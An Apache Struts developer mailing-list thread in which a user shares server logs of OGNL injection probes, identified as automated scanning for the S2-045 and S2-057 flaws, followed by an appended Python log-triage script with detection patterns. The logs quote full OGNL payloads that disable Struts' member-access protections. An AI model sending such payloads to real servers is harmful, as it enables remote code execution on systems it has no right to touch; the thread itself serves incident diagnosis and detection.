Yes, that's ok.

On Tue, 22 Jan 2019 at 09:58, Greg Huber <gregh3...@gmail.com> wrote:
>
> Always on the latest. There was a typo in my reply, sorry :-)
>
> ....OK, thanks, good work! Did return 500 so looks LIKE NO damage was done.
>
> On Tue, 22 Jan 2019 at 08:34, Lukasz Lenart <lukaszlen...@apache.org> wrote:
>
> > This looks like https://cwiki.apache.org/confluence/display/WW/S2-045
> > What version of Struts do you run?
> >
> > Cheers
> > Lukasz
> >
> > On Sun, 20 Jan 2019 at 19:11, Greg Huber <gregh3...@gmail.com> wrote:
> > >
> > > OK, thanks, good work! Did return 500 so looks damage was done.
> > >
> > > from the logs
> > > 2019-01-18 18:13:33,218 WARN org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest JakartaMultiPartRequest:parse - Unable to parse request
> > > org.apache.commons.fileupload.InvalidFileNameException: Invalid file name: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b
> > > at org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:187) ~[commons-fileupload-1.4.jar:1.4]
> > > at org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:253) ~[commons-fileupload-1.4.jar:1.4]
> > > ....
> > > ....
> > > 2019-01-18 18:13:35,032 WARN org.apache.struts2.dispatcher.mapper.DefaultActionMapper DefaultActionMapper:cleanupMethodName - #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#req=@org.apache.struts2.ServletActionContext@getRequest(),#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#w.print(#parameters.web[0]),#w.print(#parameters.path[0]),#w.close(),1?#xx:#request.toString did not match allowed method names [a-zA-Z_]*[0-9]* - default method execute will be used!
> > >
> > > Cheers Greg
> > >
> > > On Sun, 20 Jan 2019 at 14:33, Lukasz Lenart <lukaszlen...@apache.org> wrote:
> > >
> > > > On Sun, 20 Jan 2019 at 13:02, Greg Huber <gregh3...@gmail.com> wrote:
> > > > >
> > > > > Any ideas?
> > > > >
> > > > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> > > > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.1" 200 2023 "-" "Auto Spider 1.0"
> > > >
> > > > I would say a robot is scanning Internet to find vulnerable sites and
> > > > looks like it addresses the latest vulnerability with namespace
> > > > evaluation
> > > > https://cwiki.apache.org/confluence/display/WW/S2-057
> > > >
> > > > Regards
> > > > --
> > > > Łukasz
> > > > + 48 606 323 122 http://www.lenart.org.pl/

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@struts.apache.org
For additional commands, e-mail: dev-h...@struts.apache.org
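
Added example (not part of the original thread and not Struts project code): a small log triage script that flags the kind of entries quoted above, covering both the access log and the application log. The marker names, the function names and the sample lines are assumptions constructed for illustration; the sample lines are shortened versions modelled on the ones in the thread.

```python
import re
from urllib.parse import unquote

# Combined-log-format fields used here: client IP, request target, status.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Markers visible in the log entries quoted in this thread (names are made up).
MARKERS = {
    "ognl-expression": re.compile(r"[%$]\{"),
    "member-access": re.compile(r"#_memberAccess|DEFAULT_MEMBER_ACCESS"),
    "ognl-static-ref": re.compile(r"@[\w.]+@\w+"),
}

def decode(target, rounds=3):
    """Percent-decode a bounded number of times so double encoding is seen."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan_line(line):
    """Return a finding dict for a log line carrying OGNL markers, else None."""
    m = ACCESS_RE.match(line)
    text = decode(m["target"]) if m else line  # non-access lines: scan as-is
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(text))
    if not hits:
        return None
    return {"source": "access" if m else "app",
            "ip": m["ip"] if m else None,
            "status": int(m["status"]) if m else None,
            "markers": hits}

# Constructed sample lines (shortened, documentation IP), modelled on the thread.
SAMPLE = [
    '203.0.113.7 - - [18/Jan/2019:18:13:32 +0000] "POST /%25%7b(%23dm%3d%40ognl.OgnlContext'
    '%40DEFAULT_MEMBER_ACCESS)%7d/index.action HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"',
    '203.0.113.7 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.1" 200 2023 '
    '"-" "Auto Spider 1.0"',
    "2019-01-18 18:13:33,218 WARN JakartaMultiPartRequest:parse - Invalid file name: "
    "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)}",
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(scan_line(entry))
```

The second sample line returns None because this script inspects only the request target of an access log entry; a probe carried elsewhere in the request is caught only through the application log, as the third line is.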